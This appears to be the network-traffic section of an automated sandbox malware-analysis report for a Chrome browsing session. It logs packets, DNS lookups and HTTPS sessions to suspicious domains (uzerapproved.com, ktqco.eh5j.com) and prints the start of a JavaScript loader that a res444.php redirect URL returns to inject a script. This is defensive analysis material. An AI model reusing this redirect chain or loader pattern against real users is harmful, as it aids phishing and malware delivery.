Oct 2, 2024 00:19:12.443259001 CEST	49755	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:12.443272114 CEST	443	49755	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:12.707950115 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.708314896 CEST	49754	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.708329916 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.708723068 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.709018946 CEST	49754	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.709117889 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.709418058 CEST	49754	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.755403996 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.850296974 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.850349903 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.850383043 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.850409031 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.850425005 CEST	49754	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.850449085 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.850465059 CEST	49754	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.855506897 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:12.855585098 CEST	49754	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.865212917 CEST	49754	443	192.168.2.4	172.67.183.69
Oct 2, 2024 00:19:12.865232944 CEST	443	49754	172.67.183.69	192.168.2.4
Oct 2, 2024 00:19:13.089765072 CEST	443	49755	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:13.089849949 CEST	49755	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:13.092658043 CEST	49755	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:13.092677116 CEST	443	49755	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:13.092916965 CEST	443	49755	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:13.095675945 CEST	49755	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:13.143404007 CEST	443	49755	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:13.368756056 CEST	443	49755	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:13.368829966 CEST	443	49755	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:13.369371891 CEST	49755	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:13.370881081 CEST	49755	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:13.370909929 CEST	443	49755	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:13.370923042 CEST	49755	443	192.168.2.4	184.28.90.27
Oct 2, 2024 00:19:13.370929003 CEST	443	49755	184.28.90.27	192.168.2.4
Oct 2, 2024 00:19:21.211429119 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:21.211479902 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:21.211546898 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:21.213037014 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:21.213049889 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:21.642081022 CEST	443	49748	142.250.184.196	192.168.2.4
Oct 2, 2024 00:19:21.642152071 CEST	443	49748	142.250.184.196	192.168.2.4
Oct 2, 2024 00:19:21.642244101 CEST	49748	443	192.168.2.4	142.250.184.196
Oct 2, 2024 00:19:21.976257086 CEST	49748	443	192.168.2.4	142.250.184.196
Oct 2, 2024 00:19:21.976284981 CEST	443	49748	142.250.184.196	192.168.2.4
Oct 2, 2024 00:19:22.123617887 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.123709917 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:22.126945019 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:22.126966953 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.127268076 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.172288895 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:22.680851936 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:22.723412037 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.942378998 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.942406893 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.942415953 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.942430973 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.942457914 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.942476034 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:22.942508936 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.942524910 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:22.942524910 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:22.942555904 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:22.943306923 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.943380117 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:22.943397045 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.943696022 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:22.943752050 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:23.472124100 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:23.472173929 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:23.472188950 CEST	49759	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:23.472197056 CEST	443	49759	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:52.829704046 CEST	49737	443	192.168.2.4	69.49.245.172
Oct 2, 2024 00:19:52.829720974 CEST	443	49737	69.49.245.172	192.168.2.4
Oct 2, 2024 00:19:54.095415115 CEST	49742	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:19:54.095437050 CEST	443	49742	192.0.78.26	192.168.2.4
Oct 2, 2024 00:19:59.945620060 CEST	49768	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:59.945661068 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:19:59.945764065 CEST	49768	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:59.946682930 CEST	49768	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:19:59.946695089 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:00.722328901 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:00.722436905 CEST	49768	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:20:00.726667881 CEST	49768	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:20:00.726681948 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:00.726958990 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:00.736368895 CEST	49768	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:20:00.779402018 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:01.054069042 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:01.054095030 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:01.054111958 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:01.054194927 CEST	49768	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:20:01.054208994 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:01.054311991 CEST	49768	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:20:01.054625034 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:01.054666042 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:01.054735899 CEST	49768	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:20:01.054735899 CEST	49768	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:20:01.054745913 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:01.055219889 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:01.055324078 CEST	49768	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:20:01.062647104 CEST	49768	443	192.168.2.4	20.114.59.183
Oct 2, 2024 00:20:01.062668085 CEST	443	49768	20.114.59.183	192.168.2.4
Oct 2, 2024 00:20:08.888463020 CEST	443	49742	192.0.78.26	192.168.2.4
Oct 2, 2024 00:20:08.888546944 CEST	443	49742	192.0.78.26	192.168.2.4
Oct 2, 2024 00:20:08.888602972 CEST	49742	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:20:09.541258097 CEST	49742	443	192.168.2.4	192.0.78.26
Oct 2, 2024 00:20:09.541307926 CEST	443	49742	192.0.78.26	192.168.2.4
Oct 2, 2024 00:20:09.541327000 CEST	49737	443	192.168.2.4	69.49.245.172
Oct 2, 2024 00:20:09.541443110 CEST	443	49737	69.49.245.172	192.168.2.4
Oct 2, 2024 00:20:09.541627884 CEST	49737	443	192.168.2.4	69.49.245.172
Oct 2, 2024 00:20:11.883734941 CEST	49770	443	192.168.2.4	216.58.206.68
Oct 2, 2024 00:20:11.883765936 CEST	443	49770	216.58.206.68	192.168.2.4
Oct 2, 2024 00:20:11.883877993 CEST	49770	443	192.168.2.4	216.58.206.68
Oct 2, 2024 00:20:11.884324074 CEST	49770	443	192.168.2.4	216.58.206.68
Oct 2, 2024 00:20:11.884337902 CEST	443	49770	216.58.206.68	192.168.2.4
Oct 2, 2024 00:20:12.515094042 CEST	443	49770	216.58.206.68	192.168.2.4
Oct 2, 2024 00:20:12.515433073 CEST	49770	443	192.168.2.4	216.58.206.68
Oct 2, 2024 00:20:12.515445948 CEST	443	49770	216.58.206.68	192.168.2.4
Oct 2, 2024 00:20:12.516053915 CEST	443	49770	216.58.206.68	192.168.2.4
Oct 2, 2024 00:20:12.516443968 CEST	49770	443	192.168.2.4	216.58.206.68
Oct 2, 2024 00:20:12.516534090 CEST	443	49770	216.58.206.68	192.168.2.4
Oct 2, 2024 00:20:12.564553022 CEST	49770	443	192.168.2.4	216.58.206.68
Oct 2, 2024 00:20:22.441560984 CEST	443	49770	216.58.206.68	192.168.2.4
Oct 2, 2024 00:20:22.441641092 CEST	443	49770	216.58.206.68	192.168.2.4
Oct 2, 2024 00:20:22.441803932 CEST	49770	443	192.168.2.4	216.58.206.68
Oct 2, 2024 00:20:23.176186085 CEST	49770	443	192.168.2.4	216.58.206.68
Oct 2, 2024 00:20:23.176232100 CEST	443	49770	216.58.206.68	192.168.2.4
Oct 2, 2024 00:21:24.995562077 CEST	61996	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:21:25.000847101 CEST	53	61996	1.1.1.1	192.168.2.4
Oct 2, 2024 00:21:25.000952005 CEST	61996	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:21:25.001038074 CEST	61996	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:21:25.006344080 CEST	53	61996	1.1.1.1	192.168.2.4
Oct 2, 2024 00:21:25.445297956 CEST	53	61996	1.1.1.1	192.168.2.4
Oct 2, 2024 00:21:25.446610928 CEST	61996	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:21:25.452748060 CEST	53	61996	1.1.1.1	192.168.2.4
Oct 2, 2024 00:21:25.452801943 CEST	61996	53	192.168.2.4	1.1.1.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 00:19:06.886343002 CEST	53	57196	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:06.927190065 CEST	56111	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:06.927365065 CEST	53677	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:06.933082104 CEST	53	64641	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:06.939018965 CEST	53	56111	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:06.939208984 CEST	53	53677	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:07.605755091 CEST	56115	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:07.606086969 CEST	58869	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:07.609361887 CEST	55505	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:07.609754086 CEST	54889	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:07.612417936 CEST	53	56115	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:07.612683058 CEST	53	58869	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:07.641277075 CEST	53	55505	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:07.642410994 CEST	53	54889	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:08.051999092 CEST	53	58979	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:08.382455111 CEST	50003	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:08.382597923 CEST	59326	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:08.389153004 CEST	53	50003	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:08.389360905 CEST	53	59326	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:08.490200996 CEST	64295	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:08.490521908 CEST	56221	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:08.497242928 CEST	53	64295	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:08.498492002 CEST	53	56221	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:09.149899006 CEST	59547	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:09.150135994 CEST	50726	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:09.185933113 CEST	53	59547	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:09.469379902 CEST	53	50726	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:11.066905022 CEST	50957	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:11.067065001 CEST	59468	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:11.075140953 CEST	53	59468	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:11.075247049 CEST	53	50957	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:11.120857000 CEST	62068	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:11.121037006 CEST	50343	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:19:11.129565001 CEST	53	50343	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:11.157622099 CEST	53	62068	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:19.105298042 CEST	53	49594	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:22.977642059 CEST	138	138	192.168.2.4	192.168.2.255
Oct 2, 2024 00:19:25.185070038 CEST	53	53392	1.1.1.1	192.168.2.4
Oct 2, 2024 00:19:44.127450943 CEST	53	55806	1.1.1.1	192.168.2.4
Oct 2, 2024 00:20:06.342406988 CEST	53	65081	1.1.1.1	192.168.2.4
Oct 2, 2024 00:20:06.999449968 CEST	53	65321	1.1.1.1	192.168.2.4
Oct 2, 2024 00:20:11.130959988 CEST	58287	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:20:11.131134987 CEST	55212	53	192.168.2.4	1.1.1.1
Oct 2, 2024 00:20:11.881889105 CEST	53	58287	1.1.1.1	192.168.2.4
Oct 2, 2024 00:20:11.882132053 CEST	53	55212	1.1.1.1	192.168.2.4
Oct 2, 2024 00:20:34.063849926 CEST	53	59141	1.1.1.1	192.168.2.4
Oct 2, 2024 00:21:20.924758911 CEST	53	56929	1.1.1.1	192.168.2.4
Oct 2, 2024 00:21:24.995138884 CEST	53	59644	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Oct 2, 2024 00:19:09.469510078 CEST	192.168.2.4	1.1.1.1	c278	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 00:19:06.927190065 CEST	192.168.2.4	1.1.1.1	0x288	Standard query (0)	uzerapproved.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:06.927365065 CEST	192.168.2.4	1.1.1.1	0x6099	Standard query (0)	uzerapproved.com	65	IN (0x0001)	false
Oct 2, 2024 00:19:07.605755091 CEST	192.168.2.4	1.1.1.1	0x6926	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:07.606086969 CEST	192.168.2.4	1.1.1.1	0x5a18	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false
Oct 2, 2024 00:19:07.609361887 CEST	192.168.2.4	1.1.1.1	0x7682	Standard query (0)	uzerapproved.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:07.609754086 CEST	192.168.2.4	1.1.1.1	0x4ddc	Standard query (0)	uzerapproved.com	65	IN (0x0001)	false
Oct 2, 2024 00:19:08.382455111 CEST	192.168.2.4	1.1.1.1	0x74bd	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:08.382597923 CEST	192.168.2.4	1.1.1.1	0x504f	Standard query (0)	cdnjs.cloudflare.com	65	IN (0x0001)	false
Oct 2, 2024 00:19:08.490200996 CEST	192.168.2.4	1.1.1.1	0x3f96	Standard query (0)	href.li	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:08.490521908 CEST	192.168.2.4	1.1.1.1	0xc19b	Standard query (0)	href.li	65	IN (0x0001)	false
Oct 2, 2024 00:19:09.149899006 CEST	192.168.2.4	1.1.1.1	0x736d	Standard query (0)	ktqco.eh5j.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:09.150135994 CEST	192.168.2.4	1.1.1.1	0x1d97	Standard query (0)	ktqco.eh5j.com	65	IN (0x0001)	false
Oct 2, 2024 00:19:11.066905022 CEST	192.168.2.4	1.1.1.1	0x5e49	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:11.067065001 CEST	192.168.2.4	1.1.1.1	0x265d	Standard query (0)	www.google.com	65	IN (0x0001)	false
Oct 2, 2024 00:19:11.120857000 CEST	192.168.2.4	1.1.1.1	0x52eb	Standard query (0)	ktqco.eh5j.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:11.121037006 CEST	192.168.2.4	1.1.1.1	0xf79f	Standard query (0)	ktqco.eh5j.com	65	IN (0x0001)	false
Oct 2, 2024 00:20:11.130959988 CEST	192.168.2.4	1.1.1.1	0x197	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:20:11.131134987 CEST	192.168.2.4	1.1.1.1	0x634d	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 00:19:06.939018965 CEST	1.1.1.1	192.168.2.4	0x288	No error (0)	uzerapproved.com	69.49.245.172	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:07.612417936 CEST	1.1.1.1	192.168.2.4	0x6926	No error (0)	cdnjs.cloudflare.com	104.17.25.14	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:07.612417936 CEST	1.1.1.1	192.168.2.4	0x6926	No error (0)	cdnjs.cloudflare.com	104.17.24.14	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:07.612683058 CEST	1.1.1.1	192.168.2.4	0x5a18	No error (0)	cdnjs.cloudflare.com		65	IN (0x0001)	false
Oct 2, 2024 00:19:07.641277075 CEST	1.1.1.1	192.168.2.4	0x7682	No error (0)	uzerapproved.com	69.49.245.172	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:08.389153004 CEST	1.1.1.1	192.168.2.4	0x74bd	No error (0)	cdnjs.cloudflare.com	104.17.25.14	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:08.389153004 CEST	1.1.1.1	192.168.2.4	0x74bd	No error (0)	cdnjs.cloudflare.com	104.17.24.14	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:08.389360905 CEST	1.1.1.1	192.168.2.4	0x504f	No error (0)	cdnjs.cloudflare.com		65	IN (0x0001)	false
Oct 2, 2024 00:19:08.497242928 CEST	1.1.1.1	192.168.2.4	0x3f96	No error (0)	href.li	192.0.78.26	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:08.497242928 CEST	1.1.1.1	192.168.2.4	0x3f96	No error (0)	href.li	192.0.78.27	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:09.185933113 CEST	1.1.1.1	192.168.2.4	0x736d	No error (0)	ktqco.eh5j.com	172.67.183.69	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:09.185933113 CEST	1.1.1.1	192.168.2.4	0x736d	No error (0)	ktqco.eh5j.com	104.21.40.89	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:09.469379902 CEST	1.1.1.1	192.168.2.4	0x1d97	No error (0)	ktqco.eh5j.com		65	IN (0x0001)	false
Oct 2, 2024 00:19:11.075140953 CEST	1.1.1.1	192.168.2.4	0x265d	No error (0)	www.google.com		65	IN (0x0001)	false
Oct 2, 2024 00:19:11.075247049 CEST	1.1.1.1	192.168.2.4	0x5e49	No error (0)	www.google.com	142.250.184.196	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:11.129565001 CEST	1.1.1.1	192.168.2.4	0xf79f	No error (0)	ktqco.eh5j.com		65	IN (0x0001)	false
Oct 2, 2024 00:19:11.157622099 CEST	1.1.1.1	192.168.2.4	0x52eb	No error (0)	ktqco.eh5j.com	172.67.183.69	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:19:11.157622099 CEST	1.1.1.1	192.168.2.4	0x52eb	No error (0)	ktqco.eh5j.com	104.21.40.89	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:20:11.881889105 CEST	1.1.1.1	192.168.2.4	0x197	No error (0)	www.google.com	216.58.206.68	A (IP address)	IN (0x0001)	false
Oct 2, 2024 00:20:11.882132053 CEST	1.1.1.1	192.168.2.4	0x634d	No error (0)	www.google.com		65	IN (0x0001)	false

HTTP Request Dependency Graph

uzerapproved.com

cdnjs.cloudflare.com

href.li

ktqco.eh5j.com

https:

fs.microsoft.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	69.49.245.172	443	1908	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 22:19:07 UTC	591	OUT	GET /res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f4b7471434f2e6568356a2e636f6d2f4d6c4b62462f-quail HTTP/1.1 Host: uzerapproved.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-01 22:19:07 UTC	196	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 22:19:06 GMT Server: Apache Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: text/javascript;charset=UTF-8
2024-10-01 22:19:07 UTC	2019	IN	Data Raw: 37 64 37 0d 0a 20 20 20 20 76 61 72 20 51 5a 54 7a 4d 50 75 64 73 71 42 4a 73 6b 57 63 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 51 5a 54 7a 4d 50 75 64 73 71 42 4a 73 6b 57 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 51 5a 54 7a 4d 50 75 64 73 71 42 4a 73 6b 57 63 29 3b 0d 0a 51 5a 54 7a 4d 50 75 64 73 71 42 4a 73 6b 57 63 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: 7d7 var QZTzMPudsqBJskWc = document.createElement("script");QZTzMPudsqBJskWc.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(QZTzMPudsqBJskWc);QZTzMPudsqBJskWc.onload=function()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	104.17.25.14	443	1908	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 22:19:08 UTC	526	OUT	GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-01 22:19:08 UTC	930	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 22:19:08 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03e2d-bb78" Last-Modified: Mon, 04 May 2020 16:09:17 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 108074 Expires: Sun, 21 Sep 2025 22:19:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nqo3WjasMAPPwYKCGuSgwFVpmtrWQdw4JCzX%2Bh%2BEhlsWBkSoMop7SYfYYxnYq5av0CiI%2BSw7LA2Sa4bxyDiLsLyLGSU2yAXvn65LwPe7%2BBsqMw0gL6JzRMfI6K0mtTVorKCOnkAf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 8cbfd52039af4400-EWR
2024-10-01 22:19:08 UTC	439	IN	Data Raw: 37 62 66 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a Data Ascii: 7bfd!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
